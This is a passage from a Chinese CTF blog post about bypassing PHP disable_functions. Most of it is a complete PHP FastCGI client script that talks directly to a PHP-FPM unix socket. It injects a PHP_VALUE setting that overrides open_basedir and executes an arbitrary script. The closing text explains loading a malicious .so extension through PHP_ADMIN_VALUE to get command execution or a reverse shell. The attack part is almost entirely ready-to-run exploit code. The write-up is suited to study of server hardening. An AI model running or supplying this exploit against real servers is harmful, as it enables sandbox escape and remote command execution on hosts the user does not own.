class="line">292</span><br><span class="line">293</span><br><span class="line">294</span><br><span class="line">295</span><br><span class="line">296</span><br><span class="line">297</span><br><span class="line">298</span><br><span class="line">299</span><br><span class="line">300</span><br><span class="line">301</span><br><span class="line">302</span><br><span class="line">303</span><br><span class="line">304</span><br><span class="line">305</span><br><span class="line">306</span><br><span class="line">307</span><br><span class="line">308</span><br><span class="line">309</span><br><span class="line">310</span><br><span class="line">311</span><br><span class="line">312</span><br><span class="line">313</span><br><span class="line">314</span><br><span class="line">315</span><br><span class="line">316</span><br><span class="line">317</span><br><span class="line">318</span><br><span class="line">319</span><br><span class="line">320</span><br><span class="line">321</span><br><span class="line">322</span><br><span class="line">323</span><br><span class="line">324</span><br><span class="line">325</span><br><span class="line">326</span><br><span class="line">327</span><br><span class="line">328</span><br><span class="line">329</span><br><span class="line">330</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class TimedOutException extends Exception &#123;</span><br><span class="line">&#125;</span><br><span class="line">class ForbiddenException extends Exception &#123;</span><br><span class="line">&#125;</span><br><span class="line">class Client &#123;</span><br><span class="line">const VERSION_1 &#x3D; 1;</span><br><span class="line">const BEGIN_REQUEST &#x3D; 1;</span><br><span class="line">const ABORT_REQUEST &#x3D; 2;</span><br><span class="line">const END_REQUEST &#x3D; 3;</span><br><span class="line">const PARAMS &#x3D; 4;</span><br><span class="line">const STDIN &#x3D; 5;</span><br><span class="line">const STDOUT &#x3D; 6;</span><br><span class="line">const STDERR &#x3D; 7;</span><br><span class="line">const DATA &#x3D; 8;</span><br><span class="line">const GET_VALUES &#x3D; 9;</span><br><span class="line">const GET_VALUES_RESULT &#x3D; 10;</span><br><span class="line">const UNKNOWN_TYPE &#x3D; 11;</span><br><span class="line">const MAXTYPE &#x3D; self::UNKNOWN_TYPE;</span><br><span class="line">const RESPONDER &#x3D; 1;</span><br><span class="line">const AUTHORIZER &#x3D; 2;</span><br><span class="line">const FILTER &#x3D; 3;</span><br><span class="line">const REQUEST_COMPLETE &#x3D; 0;</span><br><span class="line">const CANT_MPX_CONN &#x3D; 1;</span><br><span class="line">const OVERLOADED &#x3D; 2;</span><br><span class="line">const UNKNOWN_ROLE &#x3D; 3;</span><br><span class="line">const MAX_CONNS &#x3D; &#39;MAX_CONNS&#39;;</span><br><span class="line">const MAX_REQS &#x3D; &#39;MAX_REQS&#39;;</span><br><span class="line">const MPXS_CONNS &#x3D; &#39;MPXS_CONNS&#39;;</span><br><span class="line">const HEADER_LEN &#x3D; 8;</span><br><span class="line">const REQ_STATE_WRITTEN &#x3D; 1;</span><br><span class="line">const REQ_STATE_OK &#x3D; 2;</span><br><span class="line">const REQ_STATE_ERR &#x3D; 3;</span><br><span class="line">const REQ_STATE_TIMED_OUT &#x3D; 4;</span><br><span class="line">private $_sock &#x3D; null;</span><br><span class="line">private $_host &#x3D; null;</span><br><span class="line">private $_port &#x3D; null;</span><br><span class="line">private $_keepAlive &#x3D; false;</span><br><span class="line">private $_requests &#x3D; array();</span><br><span class="line">private $_persistentSocket &#x3D; false;</span><br><span class="line">private $_connectTimeout &#x3D; 5000;</span><br><span class="line">private $_readWriteTimeout &#x3D; 5000;</span><br><span class="line">public function __construct( $host, $port ) &#123;</span><br><span class="line">    $this-&gt;_host &#x3D; $host;</span><br><span class="line">    $this-&gt;_port &#x3D; $port;</span><br><span class="line">&#125;</span><br><span class="line">public function setKeepAlive( $b ) &#123;</span><br><span class="line">          $this-&gt;_keepAlive &#x3D; (boolean) $b;</span><br><span class="line">          if ( ! $this-&gt;_keepAlive &amp;&amp; $this-&gt;_sock ) &#123;</span><br><span class="line">              fclose( $this-&gt;_sock );</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">public function getKeepAlive() &#123;</span><br><span class="line">    return $this-&gt;_keepAlive;</span><br><span class="line">&#125;</span><br><span class="line">public function setPersistentSocket( $b ) &#123;</span><br><span class="line">          $was_persistent          &#x3D; ( $this-&gt;_sock &amp;&amp; $this-&gt;_persistentSocket );</span><br><span class="line">          $this-&gt;_persistentSocket &#x3D; (boolean) $b;</span><br><span class="line">          if ( ! $this-&gt;_persistentSocket &amp;&amp; $was_persistent ) &#123;</span><br><span class="line">              fclose( $this-&gt;_sock );</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">public function getPersistentSocket() &#123;</span><br><span class="line">    return $this-&gt;_persistentSocket;</span><br><span class="line">&#125;</span><br><span class="line">public function setConnectTimeout( $timeoutMs ) &#123;</span><br><span class="line">          $this-&gt;_connectTimeout &#x3D; $timeoutMs;</span><br><span class="line">&#125;</span><br><span class="line">public function getConnectTimeout() &#123;</span><br><span class="line">    return $this-&gt;_connectTimeout;</span><br><span class="line">&#125;</span><br><span class="line">public function setReadWriteTimeout( $timeoutMs ) &#123;</span><br><span class="line">          $this-&gt;_readWriteTimeout &#x3D; $timeoutMs;</span><br><span class="line">          $this-&gt;set_ms_timeout( $this-&gt;_readWriteTimeout );</span><br><span class="line">&#125;</span><br><span class="line">public function getReadWriteTimeout() &#123;</span><br><span class="line">    return $this-&gt;_readWriteTimeout;</span><br><span class="line">&#125;</span><br><span class="line">private function set_ms_timeout( $timeoutMs ) &#123;</span><br><span class="line">          if ( ! $this-&gt;_sock ) &#123;</span><br><span class="line">        return false;</span><br><span class="line">    &#125;</span><br><span class="line">    return stream_set_timeout( $this-&gt;_sock, floor( $timeoutMs &#x2F; 1000 ), ( $timeoutMs % 1000 ) * 1000 );</span><br><span class="line">&#125;</span><br><span class="line">private function connect() &#123;</span><br><span class="line">    if ( ! $this-&gt;_sock ) &#123;</span><br><span class="line">              if ( $this-&gt;_persistentSocket ) &#123;</span><br><span class="line">                  $this-&gt;_sock &#x3D; pfsockopen( $this-&gt;_host, $this-&gt;_port, $errno, $errstr, $this-&gt;_connectTimeout &#x2F; 1000 );</span><br><span class="line">              &#125; else &#123;</span><br><span class="line">                  $this-&gt;_sock &#x3D; fsockopen( $this-&gt;_host, $this-&gt;_port, $errno, $errstr, $this-&gt;_connectTimeout &#x2F; 1000 );</span><br><span class="line">              &#125;</span><br><span class="line">              if ( ! $this-&gt;_sock ) &#123;</span><br><span class="line">                  throw new Exception( &#39;Unable to connect to FastCGI application: &#39; . $errstr );</span><br><span class="line">              &#125;</span><br><span class="line">              if ( ! $this-&gt;set_ms_timeout( $this-&gt;_readWriteTimeout ) ) &#123;</span><br><span class="line">            throw new Exception( &#39;Unable to set timeout on socket&#39; );</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">private function buildPacket( $type, $content, $requestId &#x3D; 1 ) &#123;</span><br><span class="line">          $clen &#x3D; strlen( $content );</span><br><span class="line">    return chr( self::VERSION_1 )         &#x2F;* version *&#x2F;</span><br><span class="line">           . chr( $type )                    &#x2F;* type *&#x2F;</span><br><span class="line">                 . chr( ( $requestId &gt;&gt; 8 ) &amp; 0xFF ) &#x2F;* requestIdB1 *&#x2F;</span><br><span class="line">           . chr( $requestId &amp; 0xFF )        &#x2F;* requestIdB0 *&#x2F;</span><br><span class="line">                 . chr( ( $clen &gt;&gt; 8 ) &amp; 0xFF )     &#x2F;* contentLengthB1 *&#x2F;</span><br><span class="line">           . chr( $clen &amp; 0xFF )             &#x2F;* contentLengthB0 *&#x2F;</span><br><span class="line">                 . chr( 0 )                        &#x2F;* paddingLength *&#x2F;</span><br><span class="line">                 . chr( 0 )                        &#x2F;* reserved *&#x2F;</span><br><span class="line">                 . $content;                     &#x2F;* content *&#x2F;</span><br><span class="line">&#125;</span><br><span class="line">private function buildNvpair( $name, $value ) &#123;</span><br><span class="line">    $nlen &#x3D; strlen( $name );</span><br><span class="line">    $vlen &#x3D; strlen( $value );</span><br><span class="line">    if ( $nlen &lt; 128 ) &#123;</span><br><span class="line">              &#x2F;* nameLengthB0 *&#x2F;</span><br><span class="line">              $nvpair &#x3D; chr( $nlen );</span><br><span class="line">          &#125; else &#123;</span><br><span class="line">              &#x2F;* nameLengthB3 &amp; nameLengthB2 &amp; nameLengthB1 &amp; nameLengthB0 *&#x2F;</span><br><span class="line">              $nvpair &#x3D; chr( ( $nlen &gt;&gt; 24 ) | 0x80 ) . chr( ( $nlen &gt;&gt; 16 ) &amp; 0xFF ) . chr( ( $nlen &gt;&gt; 8 ) &amp; 0xFF ) . chr( $nlen &amp; 0xFF );</span><br><span class="line">          &#125;</span><br><span class="line">          if ( $vlen &lt; 128 ) &#123;</span><br><span class="line">        &#x2F;* valueLengthB0 *&#x2F;</span><br><span class="line">        $nvpair .&#x3D; chr( $vlen );</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">        &#x2F;* valueLengthB3 &amp; valueLengthB2 &amp; valueLengthB1 &amp; valueLengthB0 *&#x2F;</span><br><span class="line">        $nvpair .&#x3D; chr( ( $vlen &gt;&gt; 24 ) | 0x80 ) . chr( ( $vlen &gt;&gt; 16 ) &amp; 0xFF ) . chr( ( $vlen &gt;&gt; 8 ) &amp; 0xFF ) . chr( $vlen &amp; 0xFF );</span><br><span class="line">    &#125;</span><br><span class="line">    &#x2F;* nameData &amp; valueData *&#x2F;</span><br><span class="line">    return $nvpair . $name . $value;</span><br><span class="line">&#125;</span><br><span class="line">private function readNvpair( $data, $length &#x3D; null ) &#123;</span><br><span class="line">    $array &#x3D; array();</span><br><span class="line">          if ( $length &#x3D;&#x3D;&#x3D; null ) &#123;</span><br><span class="line">        $length &#x3D; strlen( $data );</span><br><span class="line">    &#125;</span><br><span class="line">    $p &#x3D; 0;</span><br><span class="line">          while ( $p !&#x3D; $length ) &#123;</span><br><span class="line">              $nlen &#x3D; ord( $data&#123;$p ++&#125; );</span><br><span class="line">              if ( $nlen &gt;&#x3D; 128 ) &#123;</span><br><span class="line">                  $nlen &#x3D; ( $nlen &amp; 0x7F &lt;&lt; 24 );</span><br><span class="line">                  $nlen |&#x3D; ( ord( $data&#123;$p ++&#125; ) &lt;&lt; 16 );</span><br><span class="line">                  $nlen |&#x3D; ( ord( $data&#123;$p ++&#125; ) &lt;&lt; 8 );</span><br><span class="line">                  $nlen |&#x3D; ( ord( $data&#123;$p ++&#125; ) );</span><br><span class="line">              &#125;</span><br><span class="line">              $vlen &#x3D; ord( $data&#123;$p ++&#125; );</span><br><span class="line">              if ( $vlen &gt;&#x3D; 128 ) &#123;</span><br><span class="line">                  $vlen &#x3D; ( $nlen &amp; 0x7F &lt;&lt; 24 );</span><br><span class="line">                  $vlen |&#x3D; ( ord( $data&#123;$p ++&#125; ) &lt;&lt; 16 );</span><br><span class="line">                  $vlen |&#x3D; ( ord( $data&#123;$p ++&#125; ) &lt;&lt; 8 );</span><br><span class="line">                  $vlen |&#x3D; ( ord( $data&#123;$p ++&#125; ) );</span><br><span class="line">              &#125;</span><br><span class="line">              $array[ substr( $data, $p, $nlen ) ] &#x3D; substr( $data, $p + $nlen, $vlen );</span><br><span class="line">              $p                                   +&#x3D; ( $nlen + $vlen );</span><br><span class="line">    &#125;</span><br><span class="line">    return $array;</span><br><span class="line">&#125;</span><br><span class="line">private function decodePacketHeader( $data ) &#123;</span><br><span class="line">          $ret                  &#x3D; array();</span><br><span class="line">          $ret[&#39;version&#39;]       &#x3D; ord( $data&#123;0&#125; );</span><br><span class="line">          $ret[&#39;type&#39;]          &#x3D; ord( $data&#123;1&#125; );</span><br><span class="line">          $ret[&#39;requestId&#39;]     &#x3D; ( ord( $data&#123;2&#125; ) &lt;&lt; 8 ) + ord( $data&#123;3&#125; );</span><br><span class="line">          $ret[&#39;contentLength&#39;] &#x3D; ( ord( $data&#123;4&#125; ) &lt;&lt; 8 ) + ord( $data&#123;5&#125; );</span><br><span class="line">          $ret[&#39;paddingLength&#39;] &#x3D; ord( $data&#123;6&#125; );</span><br><span class="line">          $ret[&#39;reserved&#39;]      &#x3D; ord( $data&#123;7&#125; );</span><br><span class="line">    return $ret;</span><br><span class="line">&#125;</span><br><span class="line">private function readPacket() &#123;</span><br><span class="line">    if ( $packet &#x3D; fread( $this-&gt;_sock, self::HEADER_LEN ) ) &#123;</span><br><span class="line">        $resp            &#x3D; $this-&gt;decodePacketHeader( $packet );</span><br><span class="line">              $resp[&#39;content&#39;] &#x3D; &#39;&#39;;</span><br><span class="line">        if ( $resp[&#39;contentLength&#39;] ) &#123;</span><br><span class="line">                  $len &#x3D; $resp[&#39;contentLength&#39;];</span><br><span class="line">                  while ( $len &amp;&amp; ( $buf &#x3D; fread( $this-&gt;_sock, $len ) ) !&#x3D;&#x3D; false ) &#123;</span><br><span class="line">                      $len             -&#x3D; strlen( $buf );</span><br><span class="line">                      $resp[&#39;content&#39;] .&#x3D; $buf;</span><br><span class="line">                  &#125;</span><br><span class="line">              &#125;</span><br><span class="line">              if ( $resp[&#39;paddingLength&#39;] ) &#123;</span><br><span class="line">            $buf &#x3D; fread( $this-&gt;_sock, $resp[&#39;paddingLength&#39;] );</span><br><span class="line">        &#125;</span><br><span class="line">        return $resp;</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">        return false;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">public function getValues( array $requestedInfo ) &#123;</span><br><span class="line">          $this-&gt;connect();</span><br><span class="line">          $request &#x3D; &#39;&#39;;</span><br><span class="line">          foreach ( $requestedInfo as $info ) &#123;</span><br><span class="line">              $request .&#x3D; $this-&gt;buildNvpair( $info, &#39;&#39; );</span><br><span class="line">          &#125;</span><br><span class="line">          fwrite( $this-&gt;_sock, $this-&gt;buildPacket( self::GET_VALUES, $request, 0 ) );</span><br><span class="line">          $resp &#x3D; $this-&gt;readPacket();</span><br><span class="line">          if ( $resp[&#39;type&#39;] &#x3D;&#x3D; self::GET_VALUES_RESULT ) &#123;</span><br><span class="line">              return $this-&gt;readNvpair( $resp[&#39;content&#39;], $resp[&#39;length&#39;] );</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">        throw new Exception( &#39;Unexpected response type, expecting GET_VALUES_RESULT&#39; );</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">public function request( array $params, $stdin ) &#123;</span><br><span class="line">    $id &#x3D; $this-&gt;async_request( $params, $stdin );</span><br><span class="line">    return $this-&gt;wait_for_response( $id );</span><br><span class="line">&#125;</span><br><span class="line">public function async_request( array $params, $stdin ) &#123;</span><br><span class="line">    $this-&gt;connect();</span><br><span class="line">          &#x2F;&#x2F; Pick random number between 1 and max 16 bit unsigned int 65535</span><br><span class="line">          $id &#x3D; mt_rand( 1, ( 1 &lt;&lt; 16 ) - 1 );</span><br><span class="line">    &#x2F;&#x2F; Using persistent sockets implies you want them keept alive by server!</span><br><span class="line">    $keepAlive     &#x3D; intval( $this-&gt;_keepAlive || $this-&gt;_persistentSocket );</span><br><span class="line">          $request       &#x3D; $this-&gt;buildPacket( self::BEGIN_REQUEST</span><br><span class="line">              , chr( 0 ) . chr( self::RESPONDER ) . chr( $keepAlive ) . str_repeat( chr( 0 ), 5 )</span><br><span class="line">        , $id</span><br><span class="line">          );</span><br><span class="line">          $paramsRequest &#x3D; &#39;&#39;;</span><br><span class="line">    foreach ( $params as $key &#x3D;&gt; $value ) &#123;</span><br><span class="line">              $paramsRequest .&#x3D; $this-&gt;buildNvpair( $key, $value, $id );</span><br><span class="line">          &#125;</span><br><span class="line">          if ( $paramsRequest ) &#123;</span><br><span class="line">        $request .&#x3D; $this-&gt;buildPacket( self::PARAMS, $paramsRequest, $id );</span><br><span class="line">    &#125;</span><br><span class="line">    $request .&#x3D; $this-&gt;buildPacket( self::PARAMS, &#39;&#39;, $id );</span><br><span class="line">          if ( $stdin ) &#123;</span><br><span class="line">        $request .&#x3D; $this-&gt;buildPacket( self::STDIN, $stdin, $id );</span><br><span class="line">    &#125;</span><br><span class="line">    $request .&#x3D; $this-&gt;buildPacket( self::STDIN, &#39;&#39;, $id );</span><br><span class="line">          if ( fwrite( $this-&gt;_sock, $request ) &#x3D;&#x3D;&#x3D; false || fflush( $this-&gt;_sock ) &#x3D;&#x3D;&#x3D; false ) &#123;</span><br><span class="line">        $info &#x3D; stream_get_meta_data( $this-&gt;_sock );</span><br><span class="line">        if ( $info[&#39;timed_out&#39;] ) &#123;</span><br><span class="line">                  throw new TimedOutException( &#39;Write timed out&#39; );</span><br><span class="line">              &#125;</span><br><span class="line">              &#x2F;&#x2F; Broken pipe, tear down so future requests might succeed</span><br><span class="line">              fclose( $this-&gt;_sock );</span><br><span class="line">        throw new Exception( &#39;Failed to write request to socket&#39; );</span><br><span class="line">    &#125;</span><br><span class="line">    $this-&gt;_requests[ $id ] &#x3D; array(</span><br><span class="line">        &#39;state&#39;    &#x3D;&gt; self::REQ_STATE_WRITTEN,</span><br><span class="line">        &#39;response&#39; &#x3D;&gt; null</span><br><span class="line">    );</span><br><span class="line">    return $id;</span><br><span class="line">&#125;</span><br><span class="line">public function wait_for_response( $requestId, $timeoutMs &#x3D; 0 ) &#123;</span><br><span class="line">    if ( ! isset( $this-&gt;_requests[ $requestId ] ) ) &#123;</span><br><span class="line">        throw new Exception( &#39;Invalid request id given&#39; );</span><br><span class="line">    &#125;</span><br><span class="line">    if ( $this-&gt;_requests[ $requestId ][&#39;state&#39;] &#x3D;&#x3D; self::REQ_STATE_OK</span><br><span class="line">         || $this-&gt;_requests[ $requestId ][&#39;state&#39;] &#x3D;&#x3D; self::REQ_STATE_ERR</span><br><span class="line">    ) &#123;</span><br><span class="line">        return $this-&gt;_requests[ $requestId ][&#39;response&#39;];</span><br><span class="line">    &#125;</span><br><span class="line">    if ( $timeoutMs &gt; 0 ) &#123;</span><br><span class="line">              &#x2F;&#x2F; Reset timeout on socket for now</span><br><span class="line">              $this-&gt;set_ms_timeout( $timeoutMs );</span><br><span class="line">          &#125; else &#123;</span><br><span class="line">              $timeoutMs &#x3D; $this-&gt;_readWriteTimeout;</span><br><span class="line">    &#125;</span><br><span class="line">    $startTime &#x3D; microtime( true );</span><br><span class="line">          do &#123;</span><br><span class="line">              $resp &#x3D; $this-&gt;readPacket();</span><br><span class="line">              if ( $resp[&#39;type&#39;] &#x3D;&#x3D; self::STDOUT || $resp[&#39;type&#39;] &#x3D;&#x3D; self::STDERR ) &#123;</span><br><span class="line">                  if ( $resp[&#39;type&#39;] &#x3D;&#x3D; self::STDERR ) &#123;</span><br><span class="line">                      $this-&gt;_requests[ $resp[&#39;requestId&#39;] ][&#39;state&#39;] &#x3D; self::REQ_STATE_ERR;</span><br><span class="line">                  &#125;</span><br><span class="line">                  $this-&gt;_requests[ $resp[&#39;requestId&#39;] ][&#39;response&#39;] .&#x3D; $resp[&#39;content&#39;];</span><br><span class="line">              &#125;</span><br><span class="line">              if ( $resp[&#39;type&#39;] &#x3D;&#x3D; self::END_REQUEST ) &#123;</span><br><span class="line">                  $this-&gt;_requests[ $resp[&#39;requestId&#39;] ][&#39;state&#39;] &#x3D; self::REQ_STATE_OK;</span><br><span class="line">                  if ( $resp[&#39;requestId&#39;] &#x3D;&#x3D; $requestId ) &#123;</span><br><span class="line">                      break;</span><br><span class="line">                  &#125;</span><br><span class="line">              &#125;</span><br><span class="line">              if ( microtime( true ) - $startTime &gt;&#x3D; ( $timeoutMs * 1000 ) ) &#123;</span><br><span class="line">                  &#x2F;&#x2F; Reset</span><br><span class="line">                  $this-&gt;set_ms_timeout( $this-&gt;_readWriteTimeout );</span><br><span class="line">                  throw new Exception( &#39;Timed out&#39; );</span><br><span class="line">              &#125;</span><br><span class="line">          &#125; while ( $resp );</span><br><span class="line">    if ( ! is_array( $resp ) ) &#123;</span><br><span class="line">              $info &#x3D; stream_get_meta_data( $this-&gt;_sock );</span><br><span class="line">              &#x2F;&#x2F; We must reset timeout but it must be AFTER we get info</span><br><span class="line">              $this-&gt;set_ms_timeout( $this-&gt;_readWriteTimeout );</span><br><span class="line">              if ( $info[&#39;timed_out&#39;] ) &#123;</span><br><span class="line">                  throw new TimedOutException( &#39;Read timed out&#39; );</span><br><span class="line">              &#125;</span><br><span class="line">              if ( $info[&#39;unread_bytes&#39;] &#x3D;&#x3D; 0</span><br><span class="line">                   &amp;&amp; $info[&#39;blocked&#39;]</span><br><span class="line">                   &amp;&amp; $info[&#39;eof&#39;] ) &#123;</span><br><span class="line">                  throw new ForbiddenException( &#39;Not in white list. Check listen.allowed_clients.&#39; );</span><br><span class="line">              &#125;</span><br><span class="line">              throw new Exception( &#39;Read failed&#39; );</span><br><span class="line">          &#125;</span><br><span class="line">          &#x2F;&#x2F; Reset timeout</span><br><span class="line">          $this-&gt;set_ms_timeout( $this-&gt;_readWriteTimeout );</span><br><span class="line">          switch ( ord( $resp[&#39;content&#39;]&#123;4&#125; ) ) &#123;</span><br><span class="line">        case self::CANT_MPX_CONN:</span><br><span class="line">            throw new Exception( &#39;This app can&#39;t multiplex [CANT_MPX_CONN]&#39; );</span><br><span class="line">            break;</span><br><span class="line">        case self::OVERLOADED:</span><br><span class="line">            throw new Exception( &#39;New request rejected; too busy [OVERLOADED]&#39; );</span><br><span class="line">            break;</span><br><span class="line">        case self::UNKNOWN_ROLE:</span><br><span class="line">            throw new Exception( &#39;Role value not known [UNKNOWN_ROLE]&#39; );</span><br><span class="line">            break;</span><br><span class="line">        case self::REQUEST_COMPLETE:</span><br><span class="line">            return $this-&gt;_requests[ $requestId ][&#39;response&#39;];</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line">$client    &#x3D; new Client(&quot;unix:&#x2F;&#x2F;&#x2F;tmp&#x2F;php-cgi.sock&quot;, -1);#套接字的地址</span><br><span class="line">  $php_value &#x3D; &quot;open_basedir &#x3D; &#x2F;&quot;;#要修改的配置</span><br><span class="line">$filepath  &#x3D; &#39;&#x2F;tmp&#x2F;readflag.php&#39;;#要执行的文件</span><br><span class="line">  $content   &#x3D; &#39;hpdoger&#39;;</span><br><span class="line">echo $client-&gt;request(</span><br><span class="line">      array(</span><br><span class="line">          &#39;GATEWAY_INTERFACE&#39; &#x3D;&gt; &#39;FastCGI&#x2F;1.0&#39;,</span><br><span class="line">          &#39;REQUEST_METHOD&#39;    &#x3D;&gt; &#39;POST&#39;,</span><br><span class="line">          &#39;SCRIPT_FILENAME&#39;   &#x3D;&gt; $filepath,</span><br><span class="line">    &#39;SERVER_SOFTWARE&#39;   &#x3D;&gt; &#39;php&#x2F;fcgiclient&#39;,</span><br><span class="line">    &#39;REMOTE_ADDR&#39;       &#x3D;&gt; &#39;127.0.0.1&#39;,</span><br><span class="line">    &#39;REMOTE_PORT&#39;       &#x3D;&gt; &#39;9985&#39;,</span><br><span class="line">    &#39;SERVER_ADDR&#39;       &#x3D;&gt; &#39;127.0.0.1&#39;,</span><br><span class="line">    &#39;SERVER_PORT&#39;       &#x3D;&gt; &#39;80&#39;,</span><br><span class="line">    &#39;SERVER_NAME&#39;       &#x3D;&gt; &#39;mag-tured&#39;,</span><br><span class="line">    &#39;SERVER_PROTOCOL&#39;   &#x3D;&gt; &#39;HTTP&#x2F;1.1&#39;,</span><br><span class="line">    &#39;CONTENT_TYPE&#39;      &#x3D;&gt; &#39;application&#x2F;x-www-form-urlencoded&#39;,</span><br><span class="line">    &#39;CONTENT_LENGTH&#39;    &#x3D;&gt; strlen( $content ),</span><br><span class="line">          &#39;PHP_VALUE&#39;         &#x3D;&gt; $php_value,</span><br><span class="line">),</span><br><span class="line">$content</span><br><span class="line">);</span><br></pre></td></tr></table></figure>

<p>通过<code>$php_value = &quot;open_basedir = /&quot;;</code>修改协议，PHP_VALUE相当于改变.ini中的设置，覆盖了本身的open_basedir。</p>
<p>根据<code>SCRIPT_FILENAME</code>对php文件进行执行<code>/tmp/readflag.php</code>，必须要实际有这个文件</p>
<p>带用套接字<strong>new</strong> Client(“unix:///tmp/php-cgi.sock”, -1)</p>
<p>这里通过设置,PHP_ADMIN_VALUE[‘extension’] = /tmp/sky.so,加载扩展，引入我们的so文件从而达到可以让他执行，这样就可以达到命令执行，甚至还可以反弹shell</p>
 
      <!-- reward -->
      
    </div>
    

    <!-- copyright -->
    
    <div class="declare">
      <ul class="post-copyright">
        <li>
          <i class="ri-copyright-line"></i>
          <strong>Copyright： </strong>
          Copyright is owned by the author. For commercial reprints, please contact the author for authorization. For non-commercial reprints, please indicate the source.
        </li>
      </ul>
    </div>
    
    <footer class="article-footer">
       
<div class="share-btn">
      <span class="share-sns share-outer">
        <i class="ri-share-forward-line"></i>
        分享
      </span>
      <div class="share-wrap">
        <i class="arrow"></i>
        <div class="share-icons">
          
          <a class="weibo share-sns" href="javascript:;" data-type="weibo">
            <i class="ri-weibo-fill"></i>
          </a>
          <a class="weixin share-sns wxFab" href="javascript:;" data-type="weixin">
            <i class="ri-wechat-fill"></i>
          </a>
          <a class="qq share-sns" href="javascript:;" data-type="qq">
            <i class="ri-qq-fill"></i>
          </a>
          <a class="douban share-sns" href="javascript:;" data-type="douban">
            <i class="ri-douban-line"></i>
          </a>
          <!-- <a class="qzone share-sns" href="javascript:;" data-type="qzone">
            <i class="icon icon-qzone"></i>
          </a> -->
          
          <a class="facebook share-sns" href="javascript:;" data-type="facebook">
            <i class="ri-facebook-circle-fill"></i>
          </a>
          <a class="twitter share-sns" href="javascript:;" data-type="twitter">
            <i class="ri-twitter-fill"></i>
          </a>
          <a class="google share-sns" href="javascript:;" data-type="google">
            <i class="ri-google-fill"></i>
          </a>
        </div>
      </div>
</div>

<div class="wx-share-modal">
    <a class="modal-close" href="javascript:;"><i class="ri-close-circle-line"></i></a>
    <p>扫一扫，分享到微信</p>
    <div class="wx-qrcode">
      <img src="//api.qrserver.com/v1/create-qr-code/?size=150x150&data=http://example.com/2020/10/13/%E7%BB%95%E8%BF%87DisFunc%E5%B0%8F%E6%8A%80%E5%B7%A7/" alt="微信分享二维码">
    </div>
</div>

<div id="share-mask"></div>  
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/CTF/" rel="tag">CTF</a></li></ul>

    </footer>
  </div>

   
  <nav class="article-nav">
    
      <a href="/2020/10/24/%E5%AE%89%E5%8D%93%E4%B9%8B%E6%97%85-4/" class="article-nav-link">
        <strong class="article-nav-caption">上一篇</strong>
        <div class="article-nav-title">
          
            安卓之旅-4
          
        </div>
      </a>
    
    
      <a href="/2020/10/10/htaccess%E9%AA%9A%E6%93%8D%E4%BD%9C/" class="article-nav-link">
        <strong class="article-nav-caption">下一篇</strong>
        <div class="article-nav-title">htaccess骚操作</div>
      </a>
    
  </nav>

   
<!-- valine评论 -->
<div id="vcomments-box">
  <div id="vcomments"></div>
</div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js"></script>
<script>
  new Valine({
    el: "#vcomments",
    app_id: "",
    app_key: "",
    path: window.location.pathname,
    avatar: "monsterid",
    placeholder: "给我的文章加点评论吧~",
    recordIP: true,
  });
  const infoEle = document.querySelector("#vcomments .info");
  if (infoEle && infoEle.childNodes && infoEle.childNodes.length > 0) {
    infoEle.childNodes.forEach(function (item) {
      item.parentNode.removeChild(item);
    });
  }
</script>
<style>
  #vcomments-box {
    padding: 5px 30px;
  }

  @media screen and (max-width: 800px) {
    #vcomments-box {
      padding: 5px 0px;
    }
  }

  #vcomments-box #vcomments {
    background-color: #fff;
  }

  .v .vlist .vcard .vh {
    padding-right: 20px;
  }

  .v .vlist .vcard {
    padding-left: 10px;
  }
</style>

 
     
</article>

</section>
      <footer class="footer">
  <div class="outer">
    <ul>
      <li>
        Copyrights &copy;
        2015-2020
        <i class="ri-heart-fill heart_icon"></i> 码农
      </li>
    </ul>
    <ul>
      <li>
        
        
        
        Powered by Hexo
        <span class="division">|</span>
        Theme - <a href="https://github.com/anti-genemits" target="_blank">Anti-Genemits</a>
        
      </li>
    </ul>
    <ul>
      <li>
        
        
        <span>
  <span><i class="ri-user-3-fill"></i>Visitors:<span id="busuanzi_value_site_uv"></span></s>
  <span class="division">|</span>
  <span><i class="ri-eye-fill"></i>Views:<span id="busuanzi_value_page_pv"></span></span>
</span>
        
      </li>
    </ul>
    <ul>
      
    </ul>
    <ul>
      
    </ul>
    <ul>
      <li>
        <!-- cnzz统计 -->
        
      </li>
    </ul>
  </div>
</footer>
      <div class="float_btns">
        <div class="totop" id="totop">
  <i class="ri-arrow-up-line"></i>
</div>

<div class="todark" id="todark">
  <i class="ri-moon-line"></i>
</div>

      </div>
    </main>
    <aside class="sidebar on">
      <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <div class="logo">
    <a href="/"><img src="/images/ayer-side.svg" alt="Anti-Genemits"></a>
  </div>
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">主页</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/archives">归档</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories">分类</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/tags">标签</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/tags/%E7%BC%96%E7%A8%8B/">编程</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/tags/CTF/">CTF</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/about">关于我</a>
    </li>
    
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      
      <a class="nav-item-link nav-item-search"  title="Search">
        <i class="ri-search-line"></i>
      </a>
      
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
    </aside>
